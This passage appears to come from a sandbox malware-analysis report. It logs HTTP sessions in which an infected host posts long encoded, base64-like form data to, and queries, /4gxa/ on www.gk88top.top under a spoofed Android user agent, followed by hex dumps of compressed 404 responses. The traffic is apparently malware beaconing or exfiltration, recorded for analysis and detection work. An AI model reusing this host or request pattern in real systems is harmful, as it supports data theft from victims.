                                                                                                  Data Raw: 31 65 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7c 53 cb b2 9b 30 0c 5d 73 bf 42 a5 73 37 69 09 90 a4 4d 87 40 96 5d f6 1f 8c 2d c0 73 8d c5 60 25 37 69 a7 ff de e1 19 e8 34 dd 60 24 59 c7 47 47 52 fa 41 91 e4 7b 83 50 71 6d ce 2f e9 70 78 69 85 42 9d 5f 3c 2f ad 91 05 c8 4a b4 0e 39 f3 2f 5c 04 df 7c 08 1f 21 2b 6a cc fc ab c6 f7 86 5a f6 41 92 65 b4 9c f9 ef 5a 71 95 29 bc 6a 89 41 6f 7c 06 6d 35 6b 61 02 27 85 c1 2c de 46 13 14 6b 36 78 3e 44 07 f8 41 0c df e9 62 55 1a 0e ce 2e ec f8 3e fc 79 1b f8 d5 1d 5e 2d da 52 db 04 a2 53 6f 36 42 29 6d cb d9 ce e9 16 38 fd b3 77 e5 d4 2a 6c 83 9c 6e 7d ec 77 f7 e9 ca 1c 91 2a d4 65 c5 09 c4 51 f4 fa b8 90 93 ba 3f bb e0 15 64 b9 83 c7 04 e2 43 b3 80 dd 76 d5 0b 6d b1 1d 73 95 76 8d 11 f7 04 0a 83 b7 31 d9 e0 2d 50 ba 45 c9 9a 6c 02 92 cc a5 b6 43 4c 18 5d da 40 33 d6 2e 01 89 96 b1 3d 3d e1 30 56 1c 30 35 09 c4 bb 05 f5 ad a1 92 40 d7 e5 c0 01 00 60 a6 91 1b 92 6f a7 c9 dd 77 a5 07 5d 15 31 e7 7f 5a a3 0c 9a 4f 2f ae 52 fa 56 ad 5a 33 5c db 4d f2 ac 34 8b a7 [TRUNCATED]
                                                                                                  Data Ascii: 1ed|S0]sBs7iM@]-s`%7i4`$YGGRA{Pqm/pxiB_</J9/\|!+jZAeZq)jAo|m5ka',Fk6x>DAbU.>y^-RSo6B)m8w*ln}w*eQ?dCvmsv1-PElCL]@3.==0V05@`ow]1ZO/RVZ3\M4<I>a5B:9>7x7zYm1TXp9=JqZbN`?=}=&6H.K6gHu*~/{V(C,@i
                                                                                                  Dec 3, 2024 09:52:50.849836111 CET38INData Raw: 38 6d 56 1a 8e 1b 9f 76 93 df 2f 9d d2 57 90 46 38 97 f9 f3 58 fb fd 12 2e 43 dd b0 f8 e7 3f 00 00 00 ff ff 0d 0a
                                                                                                  Data Ascii: 8mVv/WF8X.C?
                                                                                                  Dec 3, 2024 09:52:51.434259892 CET1289INData Raw: 37 66 66 61 0d 0a 24 5a c7 ce c4 3c 8e 7c 97 bd 7a 01 e7 34 b3 73 90 73 ce b1 6f ce d9 ee 76 b6 9f 7e f1 fd 73 15 08 09 92 c8 2a b2 c8 7f ce fa bf 3f 6f d9 d6 e2 3f ff 53 66 7b f6 af 6e ca 9a 0a fe ce cd bf f3 6c ab 28 e2 7f bb 88 b3 bd 0b d1 e5
                                                                                                  Data Ascii: 7ffa$Z<|z4ssov~s*?o?Sf{nl(f[1li)3#WAE0^40R'nZ$TBNaMIW::f[.x"+h+$&)4QRI+'ZP["L]My@6w6`|
                                                                                                  Dec 3, 2024 09:52:51.434324026 CET1289INData Raw: 80 24 97 bd 7f b0 a1 9d 81 75 27 e9 d6 a4 0b 16 04 f3 47 75 31 0f c9 3f 1b fa cd 9d 93 f7 46 a6 ea 96 f9 2f 76 b8 a0 aa 67 ce d5 97 98 f5 c8 f9 e7 84 a4 cc bf 12 d1 e8 4a 2a 46 d7 1c 83 60 9d a6 f2 26 f4 62 da f0 7c e0 b0 78 fe b4 8d 53 4b b7 e6
                                                                                                  Data Ascii: $u'Gu1?F/vgJ*F`&b|xSKXr3F _g5`+jGB`%M;k|>,#T15&2k!;?iInJo6wi1qnk]^hz3&Y=gm+P2b[25=
                                                                                                  Dec 3, 2024 09:52:51.434359074 CET1289INData Raw: 13 46 18 d1 53 be 21 2b 3d 60 82 52 92 18 91 bb d3 0f f4 15 14 95 1a 6a ff 82 9c 15 c1 c4 23 c8 e9 4b b6 9d 75 fb f0 06 ee 1d 11 b7 74 eb 66 9b d7 cb df 25 bf 3a 31 7c 33 9d 53 c6 22 3c d2 62 3d 52 44 c4 e6 90 63 4f 76 e1 64 d7 0a fb f7 1d b1 70
                                                                                                  Data Ascii: FS!+=`Rj#Kutf%:1|3S"<b=RDcOvdp=<LL9Q=FrrZRqT!"6ntoMetZQzV\]{U1O1Q@Zg*)@GD+af2?~5@@L,*@6M
                                                                                                  Dec 3, 2024 09:52:51.434499979 CET1289INData Raw: fb c2 aa f2 f5 a0 25 5d b5 97 b0 23 7d 56 ce 11 5b b3 0a 1b 70 fb 1a d5 c9 6a ab 38 c3 85 30 67 55 17 dc 40 49 f9 43 e8 be 74 76 cd 24 82 f5 cb af 50 05 07 c4 1d b7 76 e5 a6 c6 9c d3 42 61 ec e6 cb ec df 9f 2f ef c4 93 8a 8d 1e f3 e0 d4 5a 7f f8
                                                                                                  Data Ascii: %]#}V[pj80gU@ICtv$PvBa/Z!i<NN0l~T H;1Qe,ti~vGHS+'xZ.jchaa!'tUh|FOT0Vk`++p:V(tEq
                                                                                                  Dec 3, 2024 09:52:51.434535980 CET1289INData Raw: 47 39 7e 84 13 ff be 9a 7b 1c 9a e3 8b d7 e5 04 e4 ce 9e 9f 1f fa 2b 5d 64 ee 1c 2a bc 7f 32 a8 00 71 b4 77 f6 ad 47 0e b2 e7 2d 70 2b ae c6 15 6a 60 e4 85 7d c3 94 f5 98 26 7f 06 e5 e2 85 b4 90 52 40 e8 6c f4 56 bb bb a1 8f b1 df 9f 2d fc 49 32
                                                                                                  Data Ascii: G9~{+]d*2qwG-p+j`}&R@lV-I2f/o4#MwstW[8rx,MXfi*:x/9HE:AF!#<!qm!Uvpcdq]sV2`1B!~?Zg7ifJ=~lJ"u'{{o;gfrye
                                                                                                  Dec 3, 2024 09:52:51.434566021 CET1289INData Raw: 6c 2f 90 0f d3 a5 7d b4 5c 89 8e d5 36 ce 1e af 9c 37 e7 f5 e5 bb f2 eb 21 6b 14 89 36 d6 67 cd d9 8a f8 a6 76 9c f4 3d 52 75 d3 ce 92 9b 58 4c ae 71 f0 3e d0 3f fc dc 9d 88 e5 cd 67 eb ab 4c 5e 36 24 d6 34 a9 e6 aa cb 77 7f 10 a2 6c b5 a6 e8 d5
                                                                                                  Data Ascii: l/}\67!k6gv=RuXLq>?gL^6$4wl#f0*aFf!`XK4<B}T4JzMpyuD<_!E:\*\Cb0) e=]JKLcxg:EDXp.Wa_z"t2uPx
                                                                                                  Dec 3, 2024 09:52:51.434597015 CET1289INData Raw: 07 89 76 91 cf ee c7 ea c6 4c cf 4b e1 c7 61 aa 97 7d 54 e7 fd f9 12 bb 11 81 ae a0 d9 5e 55 60 1d 24 6a bb a8 f3 46 aa 43 3e bf 2f 9d 42 a1 8d a1 f1 f3 26 56 5c 2b be fd 23 a8 d3 a7 e5 89 58 4d 87 df 6a 74 f2 ce ee 67 f1 08 a1 6e 91 f3 08 ef cf
                                                                                                  Data Ascii: vLKa}T^U`$jFC>/B&V\+#XMjtgn2uRJLWNy5/C1a8ix+Uxu^r)fjMp!kz=g`'&kCon}K[)m\!i9$.M?(#w<K$\2#(u
                                                                                                  Dec 3, 2024 09:52:51.434628010 CET1289INData Raw: a3 02 64 40 9b e9 91 f6 a6 79 78 27 1a 1f 41 41 08 0f e0 bf f8 c7 eb 20 24 2d e9 96 ee 35 5f b7 5e b7 5b a2 fa fc cd cb c6 0b e8 76 76 6d aa c2 ae e7 1a f3 fb 1f 83 f2 cc cf 94 e0 3e 18 87 ba 41 95 9a 3f 75 e1 65 c5 4b 89 cf 51 b5 d9 a4 ba f7 f8
                                                                                                  Data Ascii: d@yx'AA $-5_^[vvm>A?ueKQi%RmtH*jP;ptE$:)K2E}j?U%5>N:.@-)j_}}I)ojEF7@dut)c>
                                                                                                  Dec 3, 2024 09:52:51.434659958 CET1289INData Raw: 6b a4 fa ba 32 b2 85 86 66 b1 6d 99 74 b8 85 f5 24 a4 fb 2e 60 4e 17 c2 ba a5 cb 98 46 ff 75 a7 40 9e e9 72 9d 58 02 cf f3 b2 0b 7b ad 1a bf ed 0e f8 eb f1 84 d5 3e 71 c2 e8 13 c1 40 80 ed 77 8f 3f 4a 77 f0 25 2b 1c ef 17 cd 8f 0c a2 5d 2d c3 56
                                                                                                  Data Ascii: k2fmt$.`NFu@rX{>q@w?Jw%+]-V/iR-@07&aXMYpci*Ie,s1U+;LuO:6>\yAZYq]}]6jc;u-nO#'hJBYln?OT


                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                  84192.168.11.3049951104.21.7.18780
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:52:52.763207912 CET1289OUTPOST /4gxa/ HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.gk88top.top
                                                                                                  Cache-Control: max-age=0
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 3340
                                                                                                  Origin: http://www.gk88top.top
                                                                                                  Referer: http://www.gk88top.top/4gxa/
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Data Raw: 36 61 6f 6e 6c 35 78 3d 46 58 67 31 68 6e 79 77 32 64 78 44 49 43 5a 36 7a 6f 39 4d 42 44 59 4d 39 6b 37 5a 77 6a 36 38 4b 47 64 39 42 59 33 6c 38 75 76 4a 6e 34 47 7a 64 52 75 38 4b 30 76 59 45 78 73 45 6d 2f 72 54 42 59 67 48 34 64 56 4c 49 35 44 66 6c 2f 59 56 54 44 4d 53 34 49 30 6c 70 57 53 2f 47 77 53 36 33 32 6c 53 42 4f 50 59 32 39 79 36 72 73 74 76 37 76 70 35 65 51 4b 54 4c 7a 49 71 2b 42 38 53 53 6a 70 6e 64 31 37 41 77 74 37 43 67 72 2f 51 6e 46 73 59 59 59 4d 4c 79 6a 75 44 39 61 36 7a 49 79 48 63 55 63 30 67 6c 67 7a 6a 7a 5a 4a 7a 57 37 66 75 32 36 54 51 4a 33 6d 47 66 2b 72 70 6f 31 30 2f 50 72 39 77 37 43 38 47 52 55 36 42 57 32 39 32 55 68 4d 4e 75 66 67 52 6e 73 76 36 49 39 70 4a 30 57 6f 57 66 68 4d 65 4c 61 66 6c 49 6d 6e 4e 2f 58 47 71 46 7a 6f 74 67 2b 4e 72 32 6a 61 33 6f 4c 49 73 53 55 31 49 66 7a 59 75 54 5a 4b 77 61 37 6c 69 43 56 76 68 63 74 41 4c 74 2f 4a 75 31 66 50 66 77 41 34 34 67 51 35 4e 56 6f 31 55 53 32 75 78 72 62 50 30 6a 36 53 74 6e 42 46 4b 4e 43 6c 50 50 4d [TRUNCATED]
                                                                                                  Data Ascii: 6aonl5x=FXg1hnyw2dxDICZ6zo9MBDYM9k7Zwj68KGd9BY3l8uvJn4GzdRu8K0vYExsEm/rTBYgH4dVLI5Dfl/YVTDMS4I0lpWS/GwS632lSBOPY29y6rstv7vp5eQKTLzIq+B8SSjpnd17Awt7Cgr/QnFsYYYMLyjuD9a6zIyHcUc0glgzjzZJzW7fu26TQJ3mGf+rpo10/Pr9w7C8GRU6BW292UhMNufgRnsv6I9pJ0WoWfhMeLaflImnN/XGqFzotg+Nr2ja3oLIsSU1IfzYuTZKwa7liCVvhctALt/Ju1fPfwA44gQ5NVo1US2uxrbP0j6StnBFKNClPPMsjSme4QOIENTqD5Mum4YiUuD56zfjayNf+eR2lf+EneJ+aKY0Sfixle2c6tAcw7eCUOp1dLjSz2JRCZ2l0ZGYLLynwovvqIQIEQiQj11//Spf7aB+EVBUIqCCOjxnkK5y38mE9h6FkRmETFluOeJ+Yuzj5/ydJqItKG0pInBkBrg4IhjTbn1WGz4BJsUD0/mNGZ7fnU7Wifr5cNchEhokGVg3v6BgaaNmPbQ/Cq8fQbr8lIEdE+r1fFOFoPZRvxPRAoy/BqTZwhEHOOqFKEqtxMbuRb7kh9ky9O/k+pPSCzAjWSmj/H2uLa8A2F39Wt9BSUSys3iHVSrydIfXZM8QDaeMcwLlvDzvlhcVunZ7e45lrqHiHpQwlk3B7CR9c3T0aF1d0Gl0EVxLGSIGVD2o3Zo09Dh4rXUKqu7TBgQ/xCGzuZv7C8qXIQrBx6FwTKOk6sR+9RDlSQUsR56mXBAcYC/2AImwCgiJQbEO
                                                                                                  Dec 3, 2024 09:52:52.763256073 CET2517OUTData Raw: 30 34 42 38 42 42 75 63 4e 68 46 49 67 6a 6b 47 35 78 38 69 55 69 4a 56 2b 4b 76 68 56 34 71 49 51 4b 35 33 76 77 36 30 32 6e 4a 68 56 59 38 2f 6c 4f 66 30 70 57 32 59 55 61 42 4c 44 72 46 53 65 64 31 5a 57 37 34 32 4a 41 63 72 6d 79 65 74 31 48
                                                                                                  Data Ascii: 04B8BBucNhFIgjkG5x8iUiJV+KvhV4qIQK53vw602nJhVY8/lOf0pW2YUaBLDrFSed1ZW742JAcrmyet1H/qEjfZ2jGg4Otx7rTZXt9DIB4rSXdXXLW60JNsaHiytV84XXiFwKtNwQM5y4s9D7BOZUkmAAuA1rpEhZUlcI5RlXCAaHjqVuqMOkR1Z/yEKAkV+lWEs5NeRxhrGFzh+6Ogb4AnU/hbJgmCL9VlwowjsiFPoJUgQ4q
                                                                                                  Dec 3, 2024 09:52:53.477863073 CET1289INHTTP/1.1 404 Not Found
                                                                                                  Date: Tue, 03 Dec 2024 08:52:53 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Vary: Accept-Encoding
                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EKX8OLA4sYDA%2B96JDeQHj6BZZJAter%2FKPqA0l408CiSvyqq4DVnuAt0niIYJpmCF7kyh%2BXoCtWxdVG54%2FgGvTm1bfv2ZnxlWPJPyenCiByQ9gdh%2BuvTugMOLG0VEMN70w%2FE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8ec252b61a2a0c94-EWR
                                                                                                  Content-Encoding: gzip
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=102996&min_rtt=102996&rtt_var=51498&sent=3&recv=5&lost=0&retrans=0&sent_bytes=0&recv_bytes=3806&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                  Data Raw: 31 65 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7c 53 cb b2 9b 30 0c 5d 73 bf 42 a5 73 37 69 09 90 a4 4d 87 40 96 5d f6 1f 8c 2d c0 73 8d c5 60 25 37 69 a7 ff de e1 19 e8 34 dd 60 24 59 c7 47 47 52 fa 41 91 e4 7b 83 50 71 6d ce 2f e9 70 78 69 85 42 9d 5f 3c 2f ad 91 05 c8 4a b4 0e 39 f3 2f 5c 04 df 7c 08 1f 21 2b 6a cc fc ab c6 f7 86 5a f6 41 92 65 b4 9c f9 ef 5a 71 95 29 bc 6a 89 41 6f 7c 06 6d 35 6b 61 02 27 85 c1 2c de 46 13 14 6b 36 78 3e 44 07 f8 41 0c df e9 62 55 1a 0e ce 2e ec f8 3e fc 79 1b f8 d5 1d 5e 2d da 52 db 04 a2 53 6f 36 42 29 6d cb d9 ce e9 16 38 fd b3 77 e5 d4 2a 6c 83 9c 6e 7d ec 77 f7 e9 ca 1c 91 2a d4 65 c5 09 c4 51 f4 fa b8 90 93 ba 3f bb e0 15 64 b9 83 c7 04 e2 43 b3 80 dd 76 d5 0b 6d b1 1d 73 95 76 8d 11 f7 04 0a 83 b7 31 d9 e0 2d 50 ba 45 c9 9a 6c 02 92 cc a5 b6 43 4c 18 5d da 40 33 d6 2e 01 89 96 b1 3d 3d e1 30 56 1c 30 35 09 c4 bb 05 f5 ad a1 92 40 d7 e5 c0 01 00 60 a6 91 1b 92 6f a7 c9 dd 77 a5 07 5d 15 31 e7 7f 5a a3 0c 9a 4f 2f ae 52 fa 56 ad 5a 33 5c db 4d f2 ac 34 8b a7 [TRUNCATED]
                                                                                                  Data Ascii: 1ed|S0]sBs7iM@]-s`%7i4`$YGGRA{Pqm/pxiB_</J9/\|!+jZAeZq)jAo|m5ka',Fk6x>DAbU.>y^-RSo6B)m8w*ln}w*eQ?dCvmsv1-PElCL]@3.==0V05@`ow]1ZO/RVZ3\M4<I>a5B:9>7x7zYm1TXp9=JqZbN`?=}=&6H.K6gHu*~/{V(C,@
                                                                                                  Dec 3, 2024 09:52:53.477905989 CET39INData Raw: 69 38 6d 56 1a 8e 1b 9f 76 93 df 2f 9d d2 57 90 46 38 97 f9 f3 58 fb fd 12 2e 43 dd b0 f8 e7 3f 00 00 00 ff ff 0d 0a
                                                                                                  Data Ascii: i8mVv/WF8X.C?
                                                                                                  Dec 3, 2024 09:52:54.068690062 CET1289INData Raw: 37 66 66 61 0d 0a 24 5a c7 ce c4 3c 8e 7c 97 bd 7a 01 e7 34 b3 73 90 73 ce b1 6f ce d9 ee 76 b6 9f 7e f1 fd 73 15 08 09 92 c8 2a b2 c8 7f ce fa bf 3f 6f d9 d6 e2 3f ff 53 66 7b f6 af 6e ca 9a 0a fe ce cd bf f3 6c ab 28 e2 7f bb 88 b3 bd 0b d1 e5
                                                                                                  Data Ascii: 7ffa$Z<|z4ssov~s*?o?Sf{nl(f[1li)3#WAE0^40R'nZ$TBNaMIW::f[.x"+h+$&)4QRI+'ZP["L]My@6w6`|
                                                                                                  Dec 3, 2024 09:52:54.068763018 CET1289INData Raw: 80 24 97 bd 7f b0 a1 9d 81 75 27 e9 d6 a4 0b 16 04 f3 47 75 31 0f c9 3f 1b fa cd 9d 93 f7 46 a6 ea 96 f9 2f 76 b8 a0 aa 67 ce d5 97 98 f5 c8 f9 e7 84 a4 cc bf 12 d1 e8 4a 2a 46 d7 1c 83 60 9d a6 f2 26 f4 62 da f0 7c e0 b0 78 fe b4 8d 53 4b b7 e6
                                                                                                  Data Ascii: $u'Gu1?F/vgJ*F`&b|xSKXr3F _g5`+jGB`%M;k|>,#T15&2k!;?iInJo6wi1qnk]^hz3&Y=gm+P2b[25=
                                                                                                  Dec 3, 2024 09:52:54.068820953 CET1289INData Raw: 13 46 18 d1 53 be 21 2b 3d 60 82 52 92 18 91 bb d3 0f f4 15 14 95 1a 6a ff 82 9c 15 c1 c4 23 c8 e9 4b b6 9d 75 fb f0 06 ee 1d 11 b7 74 eb 66 9b d7 cb df 25 bf 3a 31 7c 33 9d 53 c6 22 3c d2 62 3d 52 44 c4 e6 90 63 4f 76 e1 64 d7 0a fb f7 1d b1 70
                                                                                                  Data Ascii: FS!+=`Rj#Kutf%:1|3S"<b=RDcOvdp=<LL9Q=FrrZRqT!"6ntoMetZQzV\]{U1O1Q@Zg*)@GD+af2?~5@@L,*@6M
                                                                                                  Dec 3, 2024 09:52:54.068852901 CET1289INData Raw: fb c2 aa f2 f5 a0 25 5d b5 97 b0 23 7d 56 ce 11 5b b3 0a 1b 70 fb 1a d5 c9 6a ab 38 c3 85 30 67 55 17 dc 40 49 f9 43 e8 be 74 76 cd 24 82 f5 cb af 50 05 07 c4 1d b7 76 e5 a6 c6 9c d3 42 61 ec e6 cb ec df 9f 2f ef c4 93 8a 8d 1e f3 e0 d4 5a 7f f8
                                                                                                  Data Ascii: %]#}V[pj80gU@ICtv$PvBa/Z!i<NN0l~T H;1Qe,ti~vGHS+'xZ.jchaa!'tUh|FOT0Vk`++p:V(tEq
                                                                                                  Dec 3, 2024 09:52:54.068881989 CET1289INData Raw: 47 39 7e 84 13 ff be 9a 7b 1c 9a e3 8b d7 e5 04 e4 ce 9e 9f 1f fa 2b 5d 64 ee 1c 2a bc 7f 32 a8 00 71 b4 77 f6 ad 47 0e b2 e7 2d 70 2b ae c6 15 6a 60 e4 85 7d c3 94 f5 98 26 7f 06 e5 e2 85 b4 90 52 40 e8 6c f4 56 bb bb a1 8f b1 df 9f 2d fc 49 32
                                                                                                  Data Ascii: G9~{+]d*2qwG-p+j`}&R@lV-I2f/o4#MwstW[8rx,MXfi*:x/9HE:AF!#<!qm!Uvpcdq]sV2`1B!~?Zg7ifJ=~lJ"u'{{o;gfrye
                                                                                                  Dec 3, 2024 09:52:54.068911076 CET1289INData Raw: 6c 2f 90 0f d3 a5 7d b4 5c 89 8e d5 36 ce 1e af 9c 37 e7 f5 e5 bb f2 eb 21 6b 14 89 36 d6 67 cd d9 8a f8 a6 76 9c f4 3d 52 75 d3 ce 92 9b 58 4c ae 71 f0 3e d0 3f fc dc 9d 88 e5 cd 67 eb ab 4c 5e 36 24 d6 34 a9 e6 aa cb 77 7f 10 a2 6c b5 a6 e8 d5
                                                                                                  Data Ascii: l/}\67!k6gv=RuXLq>?gL^6$4wl#f0*aFf!`XK4<B}T4JzMpyuD<_!E:\*\Cb0) e=]JKLcxg:EDXp.Wa_z"t2uPx
                                                                                                  Dec 3, 2024 09:52:54.068941116 CET1289INData Raw: 07 89 76 91 cf ee c7 ea c6 4c cf 4b e1 c7 61 aa 97 7d 54 e7 fd f9 12 bb 11 81 ae a0 d9 5e 55 60 1d 24 6a bb a8 f3 46 aa 43 3e bf 2f 9d 42 a1 8d a1 f1 f3 26 56 5c 2b be fd 23 a8 d3 a7 e5 89 58 4d 87 df 6a 74 f2 ce ee 67 f1 08 a1 6e 91 f3 08 ef cf
                                                                                                  Data Ascii: vLKa}T^U`$jFC>/B&V\+#XMjtgn2uRJLWNy5/C1a8ix+Uxu^r)fjMp!kz=g`'&kCon}K[)m\!i9$.M?(#w<K$\2#(u
                                                                                                  Dec 3, 2024 09:52:54.068969965 CET1289INData Raw: a3 02 64 40 9b e9 91 f6 a6 79 78 27 1a 1f 41 41 08 0f e0 bf f8 c7 eb 20 24 2d e9 96 ee 35 5f b7 5e b7 5b a2 fa fc cd cb c6 0b e8 76 76 6d aa c2 ae e7 1a f3 fb 1f 83 f2 cc cf 94 e0 3e 18 87 ba 41 95 9a 3f 75 e1 65 c5 4b 89 cf 51 b5 d9 a4 ba f7 f8
                                                                                                  Data Ascii: d@yx'AA $-5_^[vvm>A?ueKQi%RmtH*jP;ptE$:)K2E}j?U%5>N:.@-)j_}}I)ojEF7@dut)c>


                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                  85192.168.11.3049952104.21.7.18780
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  Dec 3, 2024 09:52:55.402111053 CET412OUTGET /4gxa/?6aonl5x=IVIViSCd4+diLw5iv6lFKzUz3DzQ1kWsQQRVAN/m1p/rxaGnfzS1IlrZSHFapfjNT88wuN41KZDTvbIxWygyz4hNkR6cPF/DwShRWPnwmriOjp5z/OZQWVs=&wYHk=M_B-ghc2HqoWhmeC HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                  Host: www.gk88top.top
                                                                                                  Connection: close
                                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                                                                  Dec 3, 2024 09:52:56.088455915 CET1289INHTTP/1.1 404 Not Found
                                                                                                  Date: Tue, 03 Dec 2024 08:52:56 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Vary: Accept-Encoding
                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B3hmoi%2Bm9Dnwr7v0Xv%2FSC6lKDNavhQPKhm3RhWW%2Bg2Oxxt5%2BEQcnLiVpEMtKZojOotPCG8cd%2B%2B2bAAM94nAV%2FV%2Bp5WuYYuVbHTMYaIzqY26UJ2uDVm1TxSFlf5l41tu3jSo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8ec252c68aacc454-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=102724&min_rtt=102724&rtt_var=51362&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=412&delivery_rate=0&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                  Data Raw: 34 34 38 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 [TRUNCATED]
                                                                                                  Data Ascii: 448<!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {height: 100%;}body {height: 100%;font-size: 14px;}.container {display: flex;flex-direction: column;align-items: center;height: 100%;padding-top: 12%;}.logo img
                                                                                                  Dec 3, 2024 09:52:56.088494062 CET621INData Raw: 20 7b 0a 09 09 09 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 09 09 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 2b 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 6d 61
                                                                                                  Data Ascii: { display: block; width: 100px;}.logo img + img { margin-top: 12px;}.title {margin-top: 24px;font-size: 110px;color: #333;letter-spacing: 10px;}.desc {font-size: 16px;
                                                                                                  Dec 3, 2024 09:52:56.648533106 CET1289INData Raw: 37 66 66 61 0d 0a 0a 09 09 09 09 3c 69 6d 67 20 73 72 63 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 70 6e 67 3b 62 61 73 65 36 34 2c 69 56 42 4f 52 77 30 4b 47 67 6f 41 41 41 41 4e 53 55 68 45 55 67 41 41 41 53 77 41 41 41 45 44 43 41 59 41 41 41 43
                                                                                                  Data Ascii: 7ffa<img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAASwAAAEDCAYAAACPhzmWAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAAt+wAALfsB/IdK5wAAABx0RVh0U29mdHdhcmUAQWRvYmUgRmlyZXdvcmtzIENTNui8sowAACAASURBVHic7J13eBRVF8bfMzPb0hNK6CAgVUCC9JJQFURFRQEb
                                                                                                  Dec 3, 2024 09:52:56.648593903 CET1289INData Raw: 2f 59 33 79 4c 62 59 6f 6c 6b 41 49 68 77 36 59 33 6d 32 75 2f 67 7a 77 30 46 45 4a 6a 76 47 67 4b 6f 78 32 50 72 39 68 4f 49 78 32 47 35 45 51 4a 65 4c 33 6a 4d 49 6f 6c 64 44 39 33 34 70 74 50 39 6e 4b 79 52 41 54 35 63 32 49 45 59 30 2b 53 56
                                                                                                  Data Ascii: /Y3yLbYolkAIhw6Y3m2u/gzw0FEJjvGgKox2Pr9hOIx2G5EQJeL3jMIoldD934ptP9nKyRAT5c2IEY0+SVW00j4Uf7QDZHUVo3dvUJh4qcxjGwBtcz06NX9h7x+YauPaf/kXy/pVpFg4fMz6wFHuGFXPIijWnr58bOPtF4HJab2HRuXn0AIYWdu5+TYbgxeN+x7dvTTSjHHwCPiXg4MLEwUl3eSQ8PyLRzXsgVrR/uuXvz1PLOr
                                                                                                  Dec 3, 2024 09:52:56.648622036 CET1289INData Raw: 4f 45 69 46 35 37 66 6c 7a 41 6b 42 4b 46 6d 53 50 32 6a 71 35 37 4d 6a 34 4d 67 44 57 51 52 62 34 43 38 36 79 57 4e 6f 6c 37 7a 30 53 49 7a 47 57 6d 4d 39 4d 43 31 6d 61 5a 6c 50 6a 46 5a 30 6d 4e 53 35 44 43 6d 37 37 37 36 48 78 69 6b 34 44 69
